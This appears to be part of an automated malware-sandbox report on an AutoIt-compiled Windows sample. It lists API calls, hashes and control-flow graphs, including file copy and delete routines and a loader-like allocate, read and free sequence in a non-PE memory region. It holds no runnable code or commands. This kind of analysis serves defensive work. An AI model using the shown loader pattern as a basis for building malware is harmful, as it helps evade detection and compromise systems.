                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: BuffCharUpper
                                                                        • String ID:
                                                                        • API String ID: 3964851224-0
                                                                        • Opcode ID: b8761758a04d762f04a0d32fa1ffcb51973daebad5f42414da89533a36bf7f23
                                                                        • Instruction ID: f1f11f21cc876b5ba234806933c8f405ddfb64d41b898d2773cc0974ee5d77b9
                                                                        • Opcode Fuzzy Hash: b8761758a04d762f04a0d32fa1ffcb51973daebad5f42414da89533a36bf7f23
                                                                        • Instruction Fuzzy Hash: 459278706083419FD724DF18C494B2AB7E9FF88308F14885DE99A8B3A2D775ED45CB52
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FE959
                                                                        • timeGetTime.WINMM ref: 008FEBFA
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 008FED2E
                                                                        • TranslateMessage.USER32(?), ref: 008FED3F
                                                                        • DispatchMessageW.USER32(?), ref: 008FED4A
                                                                        • LockWindowUpdate.USER32(00000000), ref: 008FED79
                                                                        • DestroyWindow.USER32 ref: 008FED85
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FED9F
                                                                        • Sleep.KERNEL32(0000000A), ref: 00965270
                                                                        • TranslateMessage.USER32(?), ref: 009659F7
                                                                        • DispatchMessageW.USER32(?), ref: 00965A05
                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00965A19
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                        • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                        • API String ID: 2641332412-570651680
                                                                        • Opcode ID: 93999083fc100cf9e5392d3d2474603169759e0ea4564588986fc1cf559f926e
                                                                        • Instruction ID: 3e5afed3cf1556cccf73d1e86b835fae8503c0182b4d93b4c08a502d371f5486
                                                                        • Opcode Fuzzy Hash: 93999083fc100cf9e5392d3d2474603169759e0ea4564588986fc1cf559f926e
                                                                        • Instruction Fuzzy Hash: D262B070508348DFDB24DF24C895BAA77E4FF84314F14496DFA8ADB2A2DB749848CB52
                                                                        APIs
                                                                        • ___createFile.LIBCMT ref: 00925EC3
                                                                        • ___createFile.LIBCMT ref: 00925F04
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00925F2D
                                                                        • __dosmaperr.LIBCMT ref: 00925F34
                                                                        • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00925F47
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00925F6A
                                                                        • __dosmaperr.LIBCMT ref: 00925F73
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00925F7C
                                                                        • __set_osfhnd.LIBCMT ref: 00925FAC
                                                                        • __lseeki64_nolock.LIBCMT ref: 00926016
                                                                        • __close_nolock.LIBCMT ref: 0092603C
                                                                        • __chsize_nolock.LIBCMT ref: 0092606C
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092607E
                                                                        • __lseeki64_nolock.LIBCMT ref: 00926176
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092618B
                                                                        • __close_nolock.LIBCMT ref: 009261EB
                                                                          • Part of subcall function 0091EA9C: CloseHandle.KERNELBASE(00000000,0099EEF4,00000000,?,00926041,0099EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091EAEC
                                                                          • Part of subcall function 0091EA9C: GetLastError.KERNEL32(?,00926041,0099EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0091EAF6
                                                                          • Part of subcall function 0091EA9C: __free_osfhnd.LIBCMT ref: 0091EB03
                                                                          • Part of subcall function 0091EA9C: __dosmaperr.LIBCMT ref: 0091EB25
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        • __lseeki64_nolock.LIBCMT ref: 0092620D
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00926342
                                                                        • ___createFile.LIBCMT ref: 00926361
                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0092636E
                                                                        • __dosmaperr.LIBCMT ref: 00926375
                                                                        • __free_osfhnd.LIBCMT ref: 00926395
                                                                        • __invoke_watson.LIBCMT ref: 009263C3
                                                                        • __wsopen_helper.LIBCMT ref: 009263DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                        • String ID: @
                                                                        • API String ID: 3896587723-2766056989
                                                                        • Opcode ID: 4545b023ffcab1d1e5cf612c6df76ca8b0a82778968d70d6ce622df727734832
                                                                        • Instruction ID: ec8af3cc19609cd71a0ccd41f5c5c140fb4d991a40d0cecd4eda6be35bf1caad
                                                                        • Opcode Fuzzy Hash: 4545b023ffcab1d1e5cf612c6df76ca8b0a82778968d70d6ce622df727734832
                                                                        • Instruction Fuzzy Hash: C9226871A0462A9BEF259F68EC45BFD7B35EF40324F254228E821DB2D9C3398D90D791

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _wcscpy.LIBCMT ref: 0093FA96
                                                                        • _wcschr.LIBCMT ref: 0093FAA4
                                                                        • _wcscpy.LIBCMT ref: 0093FABB
                                                                        • _wcscat.LIBCMT ref: 0093FACA
                                                                        • _wcscat.LIBCMT ref: 0093FAE8
                                                                        • _wcscpy.LIBCMT ref: 0093FB09
                                                                        • __wsplitpath.LIBCMT ref: 0093FBE6
                                                                        • _wcscpy.LIBCMT ref: 0093FC0B
                                                                        • _wcscpy.LIBCMT ref: 0093FC1D
                                                                        • _wcscpy.LIBCMT ref: 0093FC32
                                                                        • _wcscat.LIBCMT ref: 0093FC47
                                                                        • _wcscat.LIBCMT ref: 0093FC59
                                                                        • _wcscat.LIBCMT ref: 0093FC6E
                                                                          • Part of subcall function 0093BFA4: _wcscmp.LIBCMT ref: 0093C03E
                                                                          • Part of subcall function 0093BFA4: __wsplitpath.LIBCMT ref: 0093C083
                                                                          • Part of subcall function 0093BFA4: _wcscpy.LIBCMT ref: 0093C096
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0A9
                                                                          • Part of subcall function 0093BFA4: __wsplitpath.LIBCMT ref: 0093C0CE
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0E4
                                                                          • Part of subcall function 0093BFA4: _wcscat.LIBCMT ref: 0093C0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                        • API String ID: 2955681530-2806939583
                                                                        • Opcode ID: 24a489255a94fdab10914b2b31c22f1a5a479fb19581174de945563c6732027a
                                                                        • Instruction ID: f981615e3409cb63b8000dab432152ff91006ace72a5ac7f8c23910b1423cafe
                                                                        • Opcode Fuzzy Hash: 24a489255a94fdab10914b2b31c22f1a5a479fb19581174de945563c6732027a
                                                                        • Instruction Fuzzy Hash: 96919471604709AFDB20EB64C851F9BB3E8FF94310F048869F99997291DB71E984CF92

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 0093BDB4: __time64.LIBCMT ref: 0093BDBE
                                                                          • Part of subcall function 008F4517: _fseek.LIBCMT ref: 008F452F
                                                                        • __wsplitpath.LIBCMT ref: 0093C083
                                                                          • Part of subcall function 00911DFC: __wsplitpath_helper.LIBCMT ref: 00911E3C
                                                                        • _wcscpy.LIBCMT ref: 0093C096
                                                                        • _wcscat.LIBCMT ref: 0093C0A9
                                                                        • __wsplitpath.LIBCMT ref: 0093C0CE
                                                                        • _wcscat.LIBCMT ref: 0093C0E4
                                                                        • _wcscat.LIBCMT ref: 0093C0F7
                                                                        • _wcscmp.LIBCMT ref: 0093C03E
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C65D
                                                                          • Part of subcall function 0093C56D: _wcscmp.LIBCMT ref: 0093C670
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0093C2A1
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093C338
                                                                        • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0093C34E
                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0093C35F
                                                                        • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0093C371
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                        • String ID: p1Mw`KNw
                                                                        • API String ID: 2378138488-3626030660
                                                                        • Opcode ID: 3984fd1709d3ccfe35a8877281de3c60b013978416d045a86eeb9ccc0180990a
                                                                        • Instruction ID: 68e40ac9bcf3733a995a7d67e5b771e758898b5635d30d72724e910dcc184f36
                                                                        • Opcode Fuzzy Hash: 3984fd1709d3ccfe35a8877281de3c60b013978416d045a86eeb9ccc0180990a
                                                                        • Instruction Fuzzy Hash: 64C1F9B1A0021DAADF11DFA5CC81EEEB7BDEF99314F0040A6F609F6151DB709A848F65

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008F3F86
                                                                        • RegisterClassExW.USER32(00000030), ref: 008F3FB0
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F3FC1
                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 008F3FDE
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F3FEE
                                                                        • LoadIconW.USER32(000000A9), ref: 008F4004
                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F4013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: f6b6961e84133a13a384da1d53104762129d7f00ad1f03d994532ec2adc3f7b9
                                                                        • Instruction ID: 503fe2a166065306316eed7e5b926adae85df3245adc39a76e8e2537bb1dbd62
                                                                        • Opcode Fuzzy Hash: f6b6961e84133a13a384da1d53104762129d7f00ad1f03d994532ec2adc3f7b9
                                                                        • Instruction Fuzzy Hash: BD21F7B5D29308EFDB00DFA4ED89BCDBBB4FB08710F10421AF515A62A0D7B10584AF91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 961 8f3742-8f3762 963 8f3764-8f3767 961->963 964 8f37c2-8f37c4 961->964 965 8f3769-8f3770 963->965 966 8f37c8 963->966 964->963 967 8f37c6 964->967 970 8f382c-8f3834 PostQuitMessage 965->970 971 8f3776-8f377b 965->971 968 8f37ce-8f37d1 966->968 969 961e00-961e2e call 8f2ff6 call 90e312 966->969 972 8f37ab-8f37b3 DefWindowProcW 967->972 973 8f37f6-8f381d SetTimer RegisterWindowMessageW 968->973 974 8f37d3-8f37d4 968->974 1008 961e33-961e3a 969->1008 978 8f37f2-8f37f4 970->978 976 961e88-961e9c call 934ddd 971->976 977 8f3781-8f3783 971->977 979 8f37b9-8f37bf 972->979 973->978 983 8f381f-8f382a CreatePopupMenu 973->983 980 961da3-961da6 974->980 981 8f37da-8f37ed KillTimer call 8f3847 call 8f390f 974->981 976->978 1000 961ea2 976->1000 984 8f3789-8f378e 977->984 985 8f3836-8f3840 call 90eb83 977->985 978->979 993 961ddc-961dfb MoveWindow 980->993 994 961da8-961daa 980->994 981->978 983->978 989 961e6d-961e74 984->989 990 8f3794-8f3799 984->990 1001 8f3845 985->1001 989->972 996 961e7a-961e83 call 92a5f3 989->996 998 8f379f-8f37a5 990->998 999 961e58-961e68 call 9355bd 990->999 993->978 1002 961dac-961daf 994->1002 1003 961dcb-961dd7 SetFocus 994->1003 996->972 998->972 998->1008 999->978 1000->972 1001->978 1002->998 1004 961db5-961dc6 call 8f2ff6 1002->1004 1003->978 1004->978 1008->972 1012 961e40-961e53 call 8f3847 call 8f4ffc 1008->1012 1012->972
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 008F37B3
                                                                        • KillTimer.USER32(?,00000001), ref: 008F37DD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008F3800
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F380B
                                                                        • CreatePopupMenu.USER32 ref: 008F381F
                                                                        • PostQuitMessage.USER32(00000000), ref: 008F382E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 206e4b51e5a60583d9d4917d491d1fbc4692c05655569b9888c06a25accc651a
                                                                        • Instruction ID: d58b6134459b525f84eb6e0867d37425876fb5bd433ed5acc928458f0942c619
                                                                        • Opcode Fuzzy Hash: 206e4b51e5a60583d9d4917d491d1fbc4692c05655569b9888c06a25accc651a
                                                                        • Instruction Fuzzy Hash: B2412BF112824DABDF247B38DD5DB7A36A9FB40751F540235FB01D21E1CB609D50A761

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 008F3E79
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 008F3E88
                                                                        • LoadIconW.USER32(00000063), ref: 008F3E9E
                                                                        • LoadIconW.USER32(000000A4), ref: 008F3EB0
                                                                        • LoadIconW.USER32(000000A2), ref: 008F3EC2
                                                                          • Part of subcall function 008F4024: LoadImageW.USER32(008F0000,00000063,00000001,00000010,00000010,00000000), ref: 008F4048
                                                                        • RegisterClassExW.USER32(?), ref: 008F3F30
                                                                          • Part of subcall function 008F3F53: GetSysColorBrush.USER32(0000000F), ref: 008F3F86
                                                                          • Part of subcall function 008F3F53: RegisterClassExW.USER32(00000030), ref: 008F3FB0
                                                                          • Part of subcall function 008F3F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 008F3FC1
                                                                          • Part of subcall function 008F3F53: InitCommonControlsEx.COMCTL32(?), ref: 008F3FDE
                                                                          • Part of subcall function 008F3F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 008F3FEE
                                                                          • Part of subcall function 008F3F53: LoadIconW.USER32(000000A9), ref: 008F4004
                                                                          • Part of subcall function 008F3F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 008F4013
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: a8889c8696e7f282f827b2b793a0dc8ac1c58c3018e876ed4de9d93016c58949
                                                                        • Instruction ID: 7b77478e66c0391fc67cc7cacf7b1a69abae59d4e30ce1010c6a74001f1a45ac
                                                                        • Opcode Fuzzy Hash: a8889c8696e7f282f827b2b793a0dc8ac1c58c3018e876ed4de9d93016c58949
                                                                        • Instruction Fuzzy Hash: 832165B1D1C304ABCB04DFA9ED55A9ABFF5FB48320F50421AE204A32A0D77546909F91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1025 91acb3-91ace0 call 916ac0 call 917cf4 call 916986 1032 91ace2-91acf8 call 91e880 1025->1032 1033 91acfd-91ad02 1025->1033 1039 91af52-91af57 call 916b05 1032->1039 1035 91ad08-91ad0f 1033->1035 1037 91ad11-91ad40 1035->1037 1038 91ad42-91ad51 GetStartupInfoW 1035->1038 1037->1035 1040 91ae80-91ae86 1038->1040 1041 91ad57-91ad5c 1038->1041 1042 91af44-91af50 call 91af58 1040->1042 1043 91ae8c-91ae9d 1040->1043 1041->1040 1045 91ad62-91ad79 1041->1045 1042->1039 1046 91aeb2-91aeb8 1043->1046 1047 91ae9f-91aea2 1043->1047 1050 91ad80-91ad83 1045->1050 1051 91ad7b-91ad7d 1045->1051 1054 91aeba-91aebd 1046->1054 1055 91aebf-91aec6 1046->1055 1047->1046 1053 91aea4-91aead 1047->1053 1052 91ad86-91ad8c 1050->1052 1051->1050 1057 91adae-91adb6 1052->1057 1058 91ad8e-91ad9f call 916986 1052->1058 1059 91af3e-91af3f 1053->1059 1060 91aec9-91aed5 GetStdHandle 1054->1060 1055->1060 1062 91adb9-91adbb 1057->1062 1069 91ae33-91ae3a 1058->1069 1070 91ada5-91adab 1058->1070 1059->1040 1063 91aed7-91aed9 1060->1063 1064 91af1c-91af32 1060->1064 1062->1040 1067 91adc1-91adc6 1062->1067 1063->1064 1068 91aedb-91aee4 GetFileType 1063->1068 1064->1059 1066 91af34-91af37 1064->1066 1066->1059 1071 91ae20-91ae31 1067->1071 1072 91adc8-91adcb 1067->1072 1068->1064 1073 91aee6-91aef0 1068->1073 1074 91ae40-91ae4e 1069->1074 1070->1057 1071->1062 1072->1071 1075 91adcd-91add1 1072->1075 1076 91aef2-91aef8 1073->1076 1077 91aefa-91aefd 1073->1077 1081 91ae50-91ae72 1074->1081 1082 91ae74-91ae7b 1074->1082 1075->1071 1083 91add3-91add5 1075->1083 1078 91af05 1076->1078 1079 91af08-91af1a InitializeCriticalSectionAndSpinCount 1077->1079 1080 91aeff-91af03 1077->1080 1078->1079 1079->1059 1080->1078 1081->1074 1082->1052 1084 91ade5-91ae1a InitializeCriticalSectionAndSpinCount 1083->1084 1085 91add7-91ade3 GetFileType 1083->1085 1086 91ae1d 1084->1086 1085->1084 1085->1086 1086->1071
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 0091ACC1
                                                                          • Part of subcall function 00917CF4: __mtinitlocknum.LIBCMT ref: 00917D06
                                                                          • Part of subcall function 00917CF4: EnterCriticalSection.KERNEL32(00000000,?,00917ADD,0000000D), ref: 00917D1F
                                                                        • __calloc_crt.LIBCMT ref: 0091ACD2
                                                                          • Part of subcall function 00916986: __calloc_impl.LIBCMT ref: 00916995
                                                                          • Part of subcall function 00916986: Sleep.KERNEL32(00000000,000003BC,0090F507,?,0000000E), ref: 009169AC
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0091ACED
                                                                        • GetStartupInfoW.KERNEL32(?,009A6E28,00000064,00915E91,009A6C70,00000014), ref: 0091AD46
                                                                        • __calloc_crt.LIBCMT ref: 0091AD91
                                                                        • GetFileType.KERNEL32(00000001), ref: 0091ADD8
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0091AE11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1426640281-0
                                                                        • Opcode ID: ece0df64bdfad87c391d58ac572413e05bf270759ebd31d0f0cc3f4a00ce7fd2
                                                                        • Instruction ID: 95edff35879fcfda58a86f4b6ce93381e1fd92643ef7952eca4bb56bece55c27
                                                                        • Opcode Fuzzy Hash: ece0df64bdfad87c391d58ac572413e05bf270759ebd31d0f0cc3f4a00ce7fd2
                                                                        • Instruction Fuzzy Hash: AD81D171A062498FDB24CF68C8406EDBBF4AF45334B24425DD4AAAB3D1C7349C83DB56

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1087 1276c68-1276d16 call 1274678 1090 1276d1d-1276d43 call 1277b78 CreateFileW 1087->1090 1093 1276d45 1090->1093 1094 1276d4a-1276d5a 1090->1094 1095 1276e95-1276e99 1093->1095 1101 1276d61-1276d7b VirtualAlloc 1094->1101 1102 1276d5c 1094->1102 1096 1276edb-1276ede 1095->1096 1097 1276e9b-1276e9f 1095->1097 1103 1276ee1-1276ee8 1096->1103 1099 1276ea1-1276ea4 1097->1099 1100 1276eab-1276eaf 1097->1100 1099->1100 1106 1276eb1-1276ebb 1100->1106 1107 1276ebf-1276ec3 1100->1107 1108 1276d82-1276d99 ReadFile 1101->1108 1109 1276d7d 1101->1109 1102->1095 1104 1276f3d-1276f52 1103->1104 1105 1276eea-1276ef5 1103->1105 1112 1276f54-1276f5f VirtualFree 1104->1112 1113 1276f62-1276f6a 1104->1113 1110 1276ef7 1105->1110 1111 1276ef9-1276f05 1105->1111 1106->1107 1114 1276ec5-1276ecf 1107->1114 1115 1276ed3 1107->1115 1116 1276da0-1276de0 VirtualAlloc 1108->1116 1117 1276d9b 1108->1117 1109->1095 1110->1104 1120 1276f07-1276f17 1111->1120 1121 1276f19-1276f25 1111->1121 1112->1113 1114->1115 1115->1096 1118 1276de7-1276e02 call 1277dc8 1116->1118 1119 1276de2 1116->1119 1117->1095 1127 1276e0d-1276e17 1118->1127 1119->1095 1123 1276f3b 1120->1123 1124 1276f27-1276f30 1121->1124 1125 1276f32-1276f38 1121->1125 1123->1103 1124->1123 1125->1123 1128 1276e4a-1276e5e call 1277bd8 1127->1128 1129 1276e19-1276e48 call 1277dc8 1127->1129 1135 1276e62-1276e66 1128->1135 1136 1276e60 1128->1136 1129->1127 1137 1276e72-1276e76 1135->1137 1138 1276e68-1276e6c CloseHandle 1135->1138 1136->1095 1139 1276e86-1276e8f 1137->1139 1140 1276e78-1276e83 VirtualFree 1137->1140 1138->1137 1139->1090 1139->1095 1140->1139
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01276D39
                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01276F5F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFileFreeVirtual
                                                                        • String ID:
                                                                        • API String ID: 204039940-0
